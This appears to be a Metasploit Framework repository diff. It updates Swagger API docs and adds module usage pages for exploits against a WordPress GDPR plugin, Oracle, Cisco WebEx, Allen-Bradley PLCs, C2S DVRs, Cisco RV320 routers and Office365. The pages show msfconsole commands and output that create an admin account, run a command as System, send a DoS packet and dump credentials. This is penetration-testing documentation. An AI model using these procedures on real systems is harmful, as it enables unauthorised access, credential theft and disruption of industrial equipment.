documentation/api/v1/credential_api_doc.rb
View File

@ -33,6 +33,11 @@ module CredentialApiDoc
DATA_EXAMPLE = "'password123', '$1$5nfRD/bA$y7ZZD0NimJTbX9FtvhHJX1', or '$NT$7f8fe03093cc84b267b109625f6bbf4b'"
JTR_FORMAT_DESC = 'Comma-separated list of the formats for John the ripper to use to try and crack this.'
JTR_FORMAT_EXAMPLE = 'md5,des,bsdi,crypt'
KEY_DESC = 'The name of the key for the realm.'
KEY_EXAMPLE = 'Active Directory Domain'
VALUE_DESC = 'The value of the key for the realm.'
VALUE_EXAMPLE = 'contoso.com'
PUBLIC_TYPE_ENUM = [ 'Metasploit::Credential::BlankUsername', 'Metasploit::Credential::Username' ]
PRIVATE_TYPE_CLASS_ENUM = [
'Metasploit::Credential::ReplayableHash',
@ -108,6 +113,15 @@ module CredentialApiDoc
property :updated_at, type: :string, format: :date_time, description: RootApiDoc::UPDATED_AT_DESC
end
swagger_schema :Realm do
key :required, [:key, :value]
property :id, type: :integer, format: :int32, description: RootApiDoc::ID_DESC
property :key, type: :string, description: KEY_DESC, example: KEY_EXAMPLE
property :value, type: :string, description: VALUE_DESC, example: VALUE_EXAMPLE
property :created_at, type: :string, format: :date_time, description: RootApiDoc::CREATED_AT_DESC
property :updated_at, type: :string, format: :date_time, description: RootApiDoc::UPDATED_AT_DESC
end
swagger_path '/api/v1/credentials' do
# Swagger documentation for /api/v1/credentials GET
operation :get do
@ -197,6 +211,8 @@ module CredentialApiDoc
property :username, type: :string, description: USERNAME_DESC, example: USERNAME_EXAMPLE
property :private_data, type: :string, description: DATA_DESC, example: DATA_EXAMPLE
property :private_type, type: :string, description: PRIVATE_TYPE_DESC, enum: PRIVATE_TYPE_ENUM
property :realm_key, type: :string, description: KEY_DESC, enum: PRIVATE_TYPE_ENUM
property :realm_value, type: :string, description: VALUE_DESC, enum: PRIVATE_TYPE_ENUM
property :jtr_format, type: :string, description: JTR_FORMAT_DESC, example: JTR_FORMAT_EXAMPLE
property :address, type: :string, format: :ipv4, required: true, description: ADDRESS_DESC, example: ADDRESS_EXAMPLE
property :port, type: :int32, format: :int32, description: PORT_DESC, example: PORT_EXAMPLE
@ -312,7 +328,7 @@ module CredentialApiDoc
#Swagger documentation for /api/v1/credentials/:id PUT
operation :put do
key :description, 'Update the attributes an existing credential.'
key :description, 'Update the attributes on an existing credential.'
key :tags, [ 'credential' ]
parameter :update_id

105
documentation/api/v1/event_api_doc.rb
View File

@ -10,7 +10,7 @@ module EventApiDoc
SEEN_DESC = 'true if a user has acknowledged the event.'
USERNAME_DESC = 'Name of the user that triggered the event.'
INFO_DESC = 'Information about the event specific to the event name.'
INFO_EXAMPLE = '{:command=>"irb"}'
INFO_EXAMPLE = {command: 'irb'}
# Swagger documentation for Event model
swagger_schema :Event do
@ -27,6 +27,69 @@ module EventApiDoc
end
swagger_path '/api/v1/events' do
# Swagger documentation for /api/v1/events GET
operation :get do
key :description, 'Return events that are stored in the database.'
key :tags, [ 'event' ]
parameter :workspace
parameter do
key :name, :limit
key :in, :query
key :description, RootApiDoc::LIMIT_DESC
key :example, RootApiDoc::LIMIT_DEFAULT
key :type, :integer
key :format, :int32
key :required, false
end
parameter do
key :name, :offset
key :in, :query
key :description, RootApiDoc::OFFSET_DESC
key :example, RootApiDoc::OFFSET_DEFAULT
key :type, :integer
key :format, :int32
key :required, false
end
parameter do
key :name, :order
key :in, :query
key :description, RootApiDoc::ORDER_DESC
key :type, :string
key :required, false
key :enum, RootApiDoc::ORDER_ENUM
end
response 200 do
key :description, 'Returns event data.'
schema do
property :data do
key :type, :array
items do
key :'$ref', :Event
end
end
end
end
response 401 do
key :description, RootApiDoc::DEFAULT_RESPONSE_401
schema do
key :'$ref', :AuthErrorModel
end
end
response 500 do
key :description, RootApiDoc::DEFAULT_RESPONSE_500
schema do
key :'$ref', :ErrorModel
end
end
end
# Swagger documentation for /api/v1/events POST
operation :post do
key :description, 'Create an event.'
@ -71,4 +134,44 @@ module EventApiDoc
end
end
end
swagger_path '/api/v1/events/{id}' do
# Swagger documentation for /api/v1/events/:id GET
operation :get do
key :description, 'Return a specific event that is stored in the database.'
key :tags, [ 'event' ]
parameter do
key :name, :id
key :in, :path
key :description, 'ID of event to retrieve.'
key :required, true
key :type, :integer
key :format, :int32
end
response 200 do
key :description, 'Returns event data.'
schema do
property :data do
key :'$ref', :Event
end
end
end
response 401 do
key :description, RootApiDoc::DEFAULT_RESPONSE_401
schema do
key :'$ref', :AuthErrorModel
end
end
response 500 do
key :description, RootApiDoc::DEFAULT_RESPONSE_500
schema do
key :'$ref', :ErrorModel
end
end
end
end
end

2
documentation/api/v1/host_api_doc.rb
View File

@ -266,7 +266,7 @@ module HostApiDoc
# Swagger documentation for /api/v1/hosts/:id PUT
operation :put do
key :description, 'Update the attributes an existing host.'
key :description, 'Update the attributes on an existing host.'
key :tags, [ 'host' ]
parameter :update_id

4
documentation/api/v1/login_api_doc.rb
View File

@ -153,7 +153,7 @@ module LoginApiDoc
end
swagger_path '/api/v1/logins/{id}' do
# Swagger documentation for api/v1/logins/:id GET
# Swagger documentation for /api/v1/logins/:id GET
operation :get do
key :description, 'Return specific login that is stored in the database.'
key :tags, [ 'login' ]
@ -193,7 +193,7 @@ module LoginApiDoc
# Swagger documentation for /api/v1/logins/:id PUT
operation :put do
key :description, 'Update the attributes an existing login.'
key :description, 'Update the attributes on an existing login.'
key :tags, [ 'login' ]
parameter :update_id

23
documentation/api/v1/loot_api_doc.rb
View File

@ -10,7 +10,8 @@ module LootApiDoc
LTYPE_EXAMPLE = "'file', 'image', 'config_file', etc."
PATH_DESC = 'The on-disk path to the loot file.'
PATH_EXAMPLE = '/path/to/file.txt'
DATA_DESC = 'The contents of the file.'
DATA_DESC = "Base64 encoded copy of the file's contents."
DATA_EXAMPLE = 'dGhpcyBpcyB0aGUgZmlsZSdzIGNvbnRlbnRz'
CONTENT_TYPE_DESC = 'The mime/content type of the file at {#path}. Used to server the file correctly so browsers understand whether to render or download the file.'
CONTENT_TYPE_EXAMPLE = 'text/plain'
NAME_DESC = 'The name of the loot.'
@ -18,6 +19,9 @@ module LootApiDoc
INFO_DESC = 'Information about the loot.'
MODULE_RUN_ID_DESC = 'The ID of the module run record this loot is associated with.'
# Some of the attributes expect different data when doing a create.
CREATE_PATH_DESC = 'The name to give the file on the server. All files are stored in a server configured path, so a full path is not needed. If there is a corresponding file on disk, the given value will be prepended with a unique string to prevent accidental overwrites of other files.'
CREATE_PATH_EXAMPLE = 'password_file.txt'
# Swagger documentation for loot model
swagger_schema :Loot do
@ -28,7 +32,7 @@ module LootApiDoc
property :service_id, type: :integer, format: :int32, description: SERVICE_ID_DESC
property :ltype, type: :string, description: LTYPE_DESC, example: LTYPE_EXAMPLE
property :path, type: :string, description: PATH_DESC, example: PATH_EXAMPLE
property :data, type: :string, description: DATA_DESC
property :data, type: :string, description: DATA_DESC, example: DATA_EXAMPLE
property :content_type, type: :string, description: CONTENT_TYPE_DESC, example: CONTENT_TYPE_EXAMPLE
property :name, type: :string, description: NAME_DESC, example: NAME_EXAMPLE
property :info, type: :string, description: INFO_DESC
@ -87,8 +91,8 @@ module LootApiDoc
property :host, type: :string, format: :ipv4, description: HOST_DESC, example: RootApiDoc::HOST_EXAMPLE
property :service, '$ref': :Service
property :ltype, type: :string, description: LTYPE_DESC, example: LTYPE_EXAMPLE, required: true
property :path, type: :string, description: PATH_DESC, example: PATH_EXAMPLE, required: true
property :data, type: :string, description: DATA_DESC
property :path, type: :string, description: CREATE_PATH_DESC, example: CREATE_PATH_EXAMPLE, required: true
property :data, type: :string, description: DATA_DESC, example: DATA_EXAMPLE
property :ctype, type: :string, description: CONTENT_TYPE_DESC, example: CONTENT_TYPE_EXAMPLE
property :name, type: :string, description: NAME_DESC, example: NAME_EXAMPLE, required: true
property :info, type: :string, description: INFO_DESC
@ -195,7 +199,7 @@ module LootApiDoc
# Swagger documentation for /api/v1/loots/{id} PUT
operation :put do
key :description, 'Update the attributes an existing loot.'
key :description, 'Update the attributes on an existing loot.'
key :tags, [ 'loot' ]
parameter :update_id
@ -206,7 +210,14 @@ module LootApiDoc
key :description, 'The updated attributes to overwrite to the loot.'
key :required, true
schema do
key :'$ref', :Loot
property :workspace, type: :string, required: true, description: RootApiDoc::WORKSPACE_POST_DESC, example: RootApiDoc::WORKSPACE_POST_EXAMPLE
property :host_id, type: :integer, format: :int32, description: HOST_ID_DESC
property :service_id, type: :integer, format: :int32, description: SERVICE_ID_DESC
property :ltype, type: :string, description: LTYPE_DESC, example: LTYPE_EXAMPLE, required: true
property :path, type: :string, description: CREATE_PATH_DESC, example: CREATE_PATH_EXAMPLE, required: true
property :ctype, type: :string, description: CONTENT_TYPE_DESC, example: CONTENT_TYPE_EXAMPLE
property :name, type: :string, description: NAME_DESC, example: NAME_EXAMPLE, required: true
property :info, type: :string, description: INFO_DESC
end
end

2
documentation/api/v1/note_api_doc.rb
View File

@ -184,7 +184,7 @@ module NoteApiDoc
# Swagger documentation for /api/v1/notes/:id PUT
operation :put do
key :description, 'Update the attributes an existing note.'
key :description, 'Update the attributes on an existing note.'
key :tags, [ 'note' ]
parameter :update_id

9
documentation/api/v1/root_api_doc.rb
View File

@ -17,6 +17,15 @@ module RootApiDoc
AUTH_CODE_DESC = 'The authentication error code that was generated.'
AUTH_CODE_EXAMPLE = 401
AUTH_MESSAGE_DESC = 'A message describing the authentication error that occurred.'
LIMIT_DEFAULT = 100
LIMIT_DESC = "The maximum number of results that will be retrieved from the query. (Default: #{LIMIT_DEFAULT})"
OFFSET_DEFAULT = 0
OFFSET_DESC = "The number of results the query will begin reading from the beginning of the set. (Default: #{OFFSET_DEFAULT})"
ORDER_DESC = 'The order in which results are returned, based on the created_at datetime. (Default: desc)'
ORDER_ENUM = [
'asc',
'desc'
]
DEFAULT_RESPONSE_200 = 'Successful operation.'
DEFAULT_RESPONSE_401 = 'Authenticate to access this resource.'

2
documentation/api/v1/service_api_doc.rb
View File

@ -187,7 +187,7 @@ module ServiceApiDoc
# Swagger documentation for /api/v1/services/:id PUT
operation :put do
key :description, 'Update the attributes an existing service.'
key :description, 'Update the attributes on an existing service.'
key :tags, [ 'service' ]
parameter :update_id

2
documentation/api/v1/session_api_doc.rb
View File

@ -86,7 +86,7 @@ module SessionApiDoc
end
swagger_path '/api/v1/sessions/{id}' do
# Swagger documentation for api/v1/sessions/:id GET
# Swagger documentation for /api/v1/sessions/:id GET
operation :get do
key :description, 'Return a specific session that is stored in the database.'
key :tags, [ 'session' ]

37
documentation/api/v1/session_event_api_doc.rb
View File

@ -32,6 +32,35 @@ module SessionEventApiDoc
key :description, 'Return session events that are stored in the database.'
key :tags, [ 'session_event' ]
parameter do
key :name, :limit
key :in, :query
key :description, RootApiDoc::LIMIT_DESC
key :example, RootApiDoc::LIMIT_DEFAULT
key :type, :integer
key :format, :int32
key :required, false
end
parameter do
key :name, :offset
key :in, :query
key :description, RootApiDoc::OFFSET_DESC
key :example, RootApiDoc::OFFSET_DEFAULT
key :type, :integer
key :format, :int32
key :required, false
end
parameter do
key :name, :order
key :in, :query
key :description, RootApiDoc::ORDER_DESC
key :type, :string
key :required, false
key :enum, RootApiDoc::ORDER_ENUM
end
response 200 do
key :description, 'Returns session event data.'
schema do
@ -59,7 +88,7 @@ module SessionEventApiDoc
end
end
# Swagger documentation for /api/v1/session events POST
# Swagger documentation for /api/v1/session-events POST
operation :post do
key :description, 'Create a session events entry.'
key :tags, [ 'session_event' ]
@ -105,15 +134,15 @@ module SessionEventApiDoc
end
swagger_path '/api/v1/session-events/{id}' do
# Swagger documentation for api/v1/session-events/:id GET
# Swagger documentation for /api/v1/session-events/:id GET
operation :get do
key :description, 'Return a specific session_event that is stored in the database.'
key :description, 'Return a specific session event that is stored in the database.'
key :tags, [ 'session_event' ]
parameter do
key :name, :id
key :in, :path
key :description, 'ID of session_event to retrieve.'
key :description, 'ID of session event to retrieve.'
key :required, true
key :type, :integer
key :format, :int32

32
documentation/api/v1/vuln_api_doc.rb
View File

@ -15,10 +15,9 @@ module VulnApiDoc
ORIGIN_ID_DESC = 'ID of the associated origin record.'
ORIGIN_TYPE_DESC = 'The origin type of this vuln.'
REFS_DESC = 'An array of public reference IDs for this vuln.'
REF_ID_DESC = 'The ID of the related Mdm::ModuleRef or Mdm::VulnRef associated with this vuln.'
REF_ID_DESC = 'The ID of the related Mdm::Ref associated with this vuln.'
REF_NAME_DESC = 'Designation for external reference. May include a prefix for the authority, such as \'CVE-\', in which case the rest of the name is the designation assigned by that authority.'
REFS_EXAMPLE = ['CVE-2008-4250','OSVDB-49243','MSB-MS08-067']
MODULE_REF_DETAIL_ID_DESC = 'The ID of the Mdm::Module::Detail record this ModuleRef is associated with.'
# Swagger documentation for vulns model
swagger_schema :Vuln do
@ -32,24 +31,12 @@ module VulnApiDoc
property :vuln_attempt_count, type: :integer, format: :int32, description: VULN_ATTEMPT_COUNT
property :origin_id, type: :integer, format: :int32, description: ORIGIN_ID_DESC
property :origin_type, type: :string, description: ORIGIN_TYPE_DESC
property :vuln_refs do
key :type, :array
items do
key :'$ref', :VulnRef
end
end
property :refs do
key :type, :array
items do
key :'$ref', :Ref
end
end
property :module_refs do
key :type, :array
items do
key :'$ref', :ModuleRef
end
end
property :created_at, type: :string, format: :date_time, description: RootApiDoc::CREATED_AT_DESC
property :updated_at, type: :string, format: :date_time, description: RootApiDoc::UPDATED_AT_DESC
end
@ -63,21 +50,6 @@ module VulnApiDoc
property :updated_at, type: :string, format: :date_time, description: RootApiDoc::UPDATED_AT_DESC
end
swagger_schema :ModuleRef do
key :required, [:name]
property :id, type: :integer, format: :int32, description: RootApiDoc::ID_DESC
property :detail_id, type: :integer, format: :int32, description: MODULE_REF_DETAIL_ID_DESC
property :name, type: :string, required: true, description: REF_NAME_DESC
end
swagger_schema :VulnRef do
key :required, [:ref_id, :vuln_id]
property :id, type: :integer, format: :int32, description: RootApiDoc::ID_DESC
property :ref_id, type: :integer, format: :int32, description: RootApiDoc::CREATED_AT_DESC
property :vuln_id, type: :integer, format: :int32, description: RootApiDoc::UPDATED_AT_DESC
end
swagger_path '/api/v1/vulns' do
# Swagger documentation for /api/v1/vulns GET
operation :get do
@ -239,7 +211,7 @@ module VulnApiDoc
# Swagger documentation for /api/v1/vulns/:id PUT
operation :put do
key :description, 'Update the attributes an existing vuln.'
key :description, 'Update the attributes on an existing vuln.'
key :tags, [ 'vuln' ]
parameter :update_id

2
documentation/api/v1/workspace_api_doc.rb
View File

@ -173,7 +173,7 @@ module WorkspaceApiDoc
# Swagger documentation for /api/v1/workspaces/:id PUT
operation :put do
key :description, 'Update the attributes an existing workspaces.'
key :description, 'Update the attributes on an existing workspace.'
key :tags, [ 'workspace' ]
parameter :update_id

48
documentation/modules/auxiliary/admin/http/wp_gdpr_compliance_privesc.md Normal file
View File

@ -0,0 +1,48 @@
## Description
This module exploits the [Wordpress GDPR compliance plugin](https://wordpress.org/plugins/wp-gdpr-compliance/) lack of validation ([WPVDB 9144](https://wpvulndb.com/vulnerabilities/9144)), which affects versions 1.4.2 and lower.
When a user triggers GDPR-related actions, Wordpress's `admin-ajax.php` is called but fails to do validation and capacity checks regarding the asked actions. This leads to any unauthenticated user being able to modify any arbitrary settings on the targeted server.
This module changes the admin email (optional) to prevent notification sending, enables new user registration, changes the default role of new users to Administrator, and registers a new user that can be used for authentication. The attacker can then log in and take any actions on the newly compromised site.
## Vulnerable Application
[GDPR Compliance plugin <= 1.4.2](https://downloads.wordpress.org/plugin/wp-gdpr-compliance.1.4.2.zip)
## Verification Steps
1. Install the application
2. `./msfconsole`
3. `use auxiliary/admin/http/wp_gdpr_compliance_privesc`
4. `set RHOST [wp host]`
5. `set RPORT [wp port]`
6. `set EMAIL [email address]`
7. `run`
## Scenarios
### Tested on Debian 9.6 running Wordpress 4.7.5 with WordPress GDPR Compliance plugin 1.4.2:
```
msf5 > use auxiliary/admin/http/wp_gdpr_compliance_privesc
msf5 auxiliary(admin/http/wp_gdpr_compliance_privesc) > set verbose true
verbose => true
msf5 auxiliary(admin/http/wp_gdpr_compliance_privesc) > set rhosts 172.22.222.145
rhosts => 172.22.222.145
msf5 auxiliary(admin/http/wp_gdpr_compliance_privesc) > set email test@example.com
email => test@example.com
msf5 auxiliary(admin/http/wp_gdpr_compliance_privesc) > check
[*] Checking /wp-content/plugins/wp-gdpr-compliance/readme.txt
[*] Found version 1.4.2 of the plugin
[*] 172.22.222.145:80 The target appears to be vulnerable.
msf5 auxiliary(admin/http/wp_gdpr_compliance_privesc) > exploit
[*] Getting security token from host...
[!] Enabling user registrations...
[!] Setting the default user role type to administrator...
[*] Registering msfuser with email test@example.com
[*] Auxiliary module execution completed
msf5 auxiliary(admin/http/wp_gdpr_compliance_privesc) >
```

28
documentation/modules/auxiliary/admin/oracle/oracle_index_privesc.md Normal file
View File

@ -0,0 +1,28 @@
## Vulnerable Application
1. [Install Oracle Database](http://www.oracle.com/technetwork/indexes/downloads/index.html#database)
2. [Insert the "Scott/Tiger" test data](http://www.orafaq.com/wiki/SCOTT)
## Verification Steps
1. Install the application
2. Connect via sqlplus, and check current privileges:
1. Ex: `sqlplus SCOTT/TIGER@192.168.3.100:1521/XEXDB`
2. Ex: `SELECT * FROM session_privs`
2. Start msfconsole
3. Do: ```use auxiliary/admin/oracle/oracle_index_privesc```
4. Do: set ```SQL```, and ```TABLE``` if desired
5. Do: ```exploit```
6. Reconnect with sqlplus and check privileges post-exploit:
1. Ex: `sqlplus SCOTT/TIGER@192.168.3.100:1521/XEXDB`
2. Ex: `SELECT * FROM session_privs`
## Options
**SQL**
The SQL that will execute with the privileges of the user who created the index. Default is to escalate privileges.
**TABLE**
Table to create the index on.

47
documentation/modules/auxiliary/admin/smb/webexec_command.md Normal file
View File

@ -0,0 +1,47 @@
## Description
This module exploits a remote code execution vulnerability in Cisco's WebEx client software versions < v33.6.0.655
By supplying valid login credentials to the target machine, a single command can be executed with System privileges.
## Vulnerable Application
Cisco WebEx Client v33.3.8.7 and below
## Verification Steps
Example steps in this format (is also in the PR):
1. Install the application
2. Start msfconsole
3. Do: ```use auxiliary/admin/smb/webexec_command```
4. Do: ```set RHOSTS <IP>```
5. Do: ```set SMBUser <USERNAME>```
6. Do: ```set SMBPass <PASSWORD>```
7. Do: ```run```
8. You should get output that verifies the execution of the command
## Options
**FORCE_GUI**
Uses WMIC to create a GUI
## Scenarios
### Tested on Cisco WebEx v33.3.8.7 on Windows 7 x64 and x86
```
msf5 > use auxiliary/admin/smb/webexec_command
msf5 auxiliary(admin/smb/webexec_command) > set rhosts 192.168.37.136
rhosts => 192.168.37.136
msf5 auxiliary(admin/smb/webexec_command) > set smbuser a_user
smbuser => a_user
msf5 auxiliary(admin/smb/webexec_command) > set smbpass password
smbpass => password
msf5 auxiliary(admin/smb/webexec_command) > run
[+] 192.168.37.136:445 - Command completed!
[*] 192.168.37.136:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(admin/smb/webexec_command) >
```

36
documentation/modules/auxiliary/dos/scada/allen_bradley_pccc.md Normal file
View File

@ -0,0 +1,36 @@
## Vulnerable Application
A remote, unauthenticated attacker could send a single, specially crafted Programmable Controller Communication Commands (PCCC) packet to the controller that could potentially cause the controller to enter a DoS condition.
MicroLogix 1100 controllers are affected: 1763-L16BWA, 1763-L16AWA, 1763-L16BBB, and 1763-L16DWD.
CVE-2017-7924 has been assigned to this vulnerability.
A CVSS v3 base score of 7.5 has been assigned.
## Verification Steps
1. Do: `use auxiliary/dos/scada/allen_bradley_pccc`
2. Do: `set RHOST=IP` where IP is the IP address of the target
3. Do: `check` verify if target is vulnerable
4. Do: `exploit` send DoS packet
## Options
1. PORT: `set RPORT=44818`
## Scenarios
```
msf > use auxiliary/dos/scada/allen_bradley_pccc
msf auxiliary(dos/scada/allen_bradley_pccc) > set RHOST 172.27.248.194
RHOST => 172.27.248.194
msf auxiliary(dos/scada/allen_bradley_pccc) > check
[*] 172.27.248.194:44818 - Product Name: 1763-L16BWA B/14.00
[+] 172.27.248.194:44818 - The target is vulnerable.
msf auxiliary(dos/scada/allen_bradley_pccc) > exploit
[*] 172.27.248.194:44818 - Ethernet/IP - Session created (id 0xaf79a666)
[*] 172.27.248.194:44818 - CIP Connection Manager - Forward Open Success (Connection id 0x66a66e85)
[*] 172.27.248.194:44818 - Sending PCCC DoS magic packet...
[*] Auxiliary module execution completed
```

76
documentation/modules/auxiliary/gather/c2s_dvr_password_disclosure.md Normal file
View File

@ -0,0 +1,76 @@
## Description
C2S DVR allows an unauthenticated user to disclose the username
& password by requesting the javascript page 'read.cgi?page=2'.
This may also work on some cameras including IRDOME-II-C2S, IRBOX-II-C2S.
## Vulnerable Application
This module has been verified against the mock vulnerable page listed below.
### Mock Vulnerable Page
These instructions will create a cgi environment and a vulnerable perl application for exploitation.
Kali rolling (2019.1) was utilized for this tutorial, with apache.
#### Setup
1. Enable cgi: `a2enmod cgid`
2. `mkdir /var/www/html/cgi-bin`
3. Enable folder for cgi execution: add `ScriptAlias "/cgi-bin/" "/var/www/html/cgi-bin/"` to `/etc/apache2/sites-enabled/000-default.conf ` inside of the `VirtualHost` tags
4. Create the vulnerable page by writing the following text to `/var/www/html/cgi-bin/read.cgi`:
```
#!/usr/bin/perl
use CGI qw(:standard);
$query = new CGI;
print $query->header( -type=> "text/javascript"),
$query->import_names( 'Q' );
my $data = <<'DATA';
var pw_enflag = "1";
var pw_adminpw = "12345";
var pw_retype1 = "12345";
var pw_userpw = "56789";
var pw_retype2 = "56789";
var pw_autolock = "0";
DATA
if ($Q::page == 2) {
print $data;
}
```
## Verification Steps
1. Start msfconsole
2. ```use auxiliary/gather/c2s_dvr_password_disclosure```
3. ```set rhosts [rhosts]```
4. ```run```
## Scenarios
### Against the Mock page listed above
```
resource (c2s.rb)> use auxiliary/gather/c2s_dvr_password_disclosure
resource (c2s.rb)> set rhosts 127.0.0.1
rhosts => 127.0.0.1
resource (c2s.rb)> set verbose true
verbose => true
resource (c2s.rb)> exploit
[*] Attempting to load data from /cgi-bin/read.cgi?page=2
[+] Found: admin:12345
[+] Found: user:56789
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
[*] Starting persistent handler(s)...
msf5 auxiliary(gather/c2s_dvr_password_disclosure) > creds
Credentials
===========
host origin service public private realm private_type
---- ------ ------- ------ ------- ----- ------------
127.0.0.1 127.0.0.1 80/tcp (http) admin 12345 Password
127.0.0.1 127.0.0.1 80/tcp (http) user 56789 Password
```

124
documentation/modules/auxiliary/gather/cisco_rv320_config.md Normal file
View File

@ -0,0 +1,124 @@
## Vulnerable Application
[CVE-2019-1653](https://nvd.nist.gov/vuln/detail/CVE-2019-1653) (aka Cisco Bugtracker ID [CSCvg85922](https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-info)) is an unauthenticated disclosure of device configuration information for the Cisco RV320/RV325 small business router. The vulnerability was responsibly disclosed by [RedTeam Pentesting GmbH](https://seclists.org/fulldisclosure/2019/Jan/52).
An exposed remote administration interface (on :443) would allow an attacker to retrieve password hashes and other sensitive device configuration information. On version `1.4.2.15`, the vulnerabilty is exploitable via the WAN interface on port 8007 (by default) or 443 (if remote administration is enabled), in addition to port 443 on the LAN side. On version `1.4.2.17`, only LAN port 443 is accessible by default, but user configuration can open port 443 for remote management on the WAN side, making the device vulnerable externally.
More context is available from [Rapid7's blog post](https://blog.rapid7.com/2019/01/29/cisco-r-rv320-rv325-router-unauthenticated-configuration-export-vulnerability-cve-2019-1653-what-you-need-to-know/).
## Verification Steps
1. Start `msfconsole`
2. `use auxiliary/gather/cisco_rv320_config`
3. `set RHOSTS 192.168.1.1` (default LAN IP) or to the WAN interface
4. `run`
5. Review the downloaded configuration file cited in the output. For example:
>```
>[+] Stored configuration (128658 bytes) to /home/administrator/.msf4/loot/20190206213439_default_172.16.0.34_cisco.rv.config_791561.txt
>```
6. If the database is connected, review the `hosts`, `creds`, and `loot` commands
## Options
*SSL*: Should be set to 'true' for port 443 and set to 'false' for port 80 or port 8007.
*TARGETURI*: Should point to the `/cgi-bin/config.exp` endpoint and likely should never be changed.
## Scenarios
#### Against firmware version 1.4.2.15, which on the LAN side, port 443:
```
msf5 >
msf5 > use auxiliary/gather/cisco_rv320_config
msf5 auxiliary(gather/cisco_rv320_config) > set RHOSTS 192.168.1.1
RHOSTS => 192.168.1.1
msf5 auxiliary(gather/cisco_rv320_config) > run
[+] Stored configuration (128628 bytes) to /home/administrator/.msf4/loot/20190206165015_default_192.168.1.1_cisco.rv.config_434637.txt
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```
#### Against firmware version 1.4.2.15, on the WAN side, port 8007:
```
msf5 >
msf5 > use auxiliary/gather/cisco_rv320_config
msf5 auxiliary(gather/cisco_rv320_config) > set RHOSTS 172.16.0.34
RHOSTS => 192.168.1.1
msf5 auxiliary(gather/cisco_rv320_config) > set RPORT 8007
RPORT => 8007
msf5 auxiliary(gather/cisco_rv320_config) > set SSL false
SSL => false
msf5 auxiliary(gather/cisco_rv320_config) > run
[+] Stored configuration (128628 bytes) to /home/administrator/.msf4/loot/20190206165015_default_192.168.1.1_cisco.rv.config_434637.txt
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```
#### Against firmware version 1.4.2.17, which on the LAN side, port 443:
```
msf5 >
msf5 > use auxiliary/gather/cisco_rv320_config
msf5 auxiliary(gather/cisco_rv320_config) > set RHOSTS 192.168.1.1
RHOSTS => 192.168.1.1
msf5 auxiliary(gather/cisco_rv320_config) > run
[+] Stored configuration (128628 bytes) to /home/administrator/.msf4/loot/20190206165015_default_192.168.1.1_cisco.rv.config_434637.txt
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```
#### Against newer firmware (>= 1.4.2.19):
```
msf5 >
msf5 > use auxiliary/gather/cisco_rv320_config
msf5 auxiliary(gather/cisco_rv320_config) > set RHOSTS 192.168.1.1
RHOSTS => 192.168.1.1
msf5 auxiliary(gather/cisco_rv320_config) > run
[-] Auxiliary aborted due to failure: not-vulnerable: Response suggests device is patched
[*] Auxiliary module execution completed
```
#### If module succeeds, check the database:
```
msf5 auxiliary(gather/cisco_rv320_config) > hosts
Hosts
=====
address mac name os_name os_flavor os_sp purpose info comments
------- --- ---- ------- --------- ----- ------- ---- --------
172.16.0.34 70:E4:22:94:E7:20 router94e720 Cisco RV320
192.168.1.1 70:E4:22:94:E7:20 router94e720 Cisco RV320
```
```
msf5 auxiliary(gather/cisco_rv320_config) > creds
Credentials
===========
host origin service public private realm private_type
---- ------ ------- ------ ------- ----- ------------
172.16.0.34 192.168.1.1 8007/tcp (http) cisco $1$mldcsfp$gCrnS7A0ta6E5EzwDiZ9t/ Nonreplayable hash
192.168.1.1 192.168.1.1 443/tcp (https) cisco $1$mldcsfp$gCrnS7A0ta6E5EzwDiZ9t/ Nonreplayable hash
```
```
msf5 auxiliary(gather/cisco_rv320_config) > loot
Loot
====
host service type name content info path
---- ------- ---- ---- ------- ---- ----
172.16.0.34 cisco.rv.config text/plain /home/administrator/.msf4/loot/20190206213439_default_172.16.0.34_cisco.rv.config_791561.txt
192.168.1.1 cisco.rv.config text/plain /home/administrator/.msf4/loot/20190206211312_default_192.168.1.1_cisco.rv.config_412095.txt
```

77
documentation/modules/auxiliary/gather/office365userenum.md Normal file
View File

@ -0,0 +1,77 @@
External python module compatible with v2 and v3.
Enumerate valid usernames (email addresses) from Office 365 using ActiveSync.
Differences in the HTTP Response code and HTTP Headers can be used to differentiate between:
- Valid Username (Response code 401)
- Valid Username and Password without 2FA (Response Code 200)
- Valid Username and Password with 2FA (Response Code 403)
- Invalid Username (Response code 404 with Header X-CasErrorCode: UserNotFound)
Note this behaviour appears to be limited to Office365, MS Exchange does not appear to be affected.
Microsoft Security Response Center stated on 2017-06-28 that this issue does not "meet the bar for security servicing". As such it is not expected to be fixed any time soon.
This script is maintaing the ability to run independently of MSF.
## Vulnerable Application
Office365's implementation of ActiveSync
## Verification Steps
1. Create a file containing candidate usernames (aka email addresses), one per line.
2. Do: ```use auxiliary/gather/office365userenum```
3. Do: ```set users [USER_FILE]``` with the file you created.
4. Do: ```run```
5. Valid and Invalid usernames will be printed out to the screen.
## Options
LOGFILE = Output file to use for verbose logging.
OUTPUT = Output file for results.
PASSWORD = Password to use during enumeration. Note this must exist
but does not necessarily need to be valid. If it is
found to be valid for an account it will be reported.
THREADS = Number of concurrent requests to use during enumeration.
TIMEOUT = HTTP request timeout to use during enumeration.
URL = URL of Office365 ActiveSync service.
USERS = Input fie containing candidate usernames, one per line.
VERBOSE = Enable/Disable DEBUG logging
## Scenarios
The following demonstrates basic usage, using the supplied users wordlist
and default options.
```
msf5 auxiliary(gather/office365userenum) > set users /home/msfdev/users
users => /home/msfdev/users
msf5 auxiliary(gather/office365userenum) > run
[*]
. .1111... | Title: office365userenum.py
.10000000000011. .. | Author: Oliver Morton (Sec-1 Ltd)
.00 000... | Email: oliverm@sec-1.com
1 01.. | Description:
.. | Enumerate valid usernames from Office 365 using
.. | ActiveSync.
GrimHacker .. | Requires: Python 2.7 or 3.6, python-requests
.. |
grimhacker.com .. |
@grimhacker .. |
----------------------------------------------------------------------------
This program comes with ABSOLUTELY NO WARRANTY.
This is free software, and you are welcome to redistribute it
under certain conditions. See GPLv2 License.
----------------------------------------------------------------------------
[+] 401 VALID_USER valid_username@example.com:Password1
[-] 404 INVALID_USER invalid_username@example.com:Password1
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```
## References
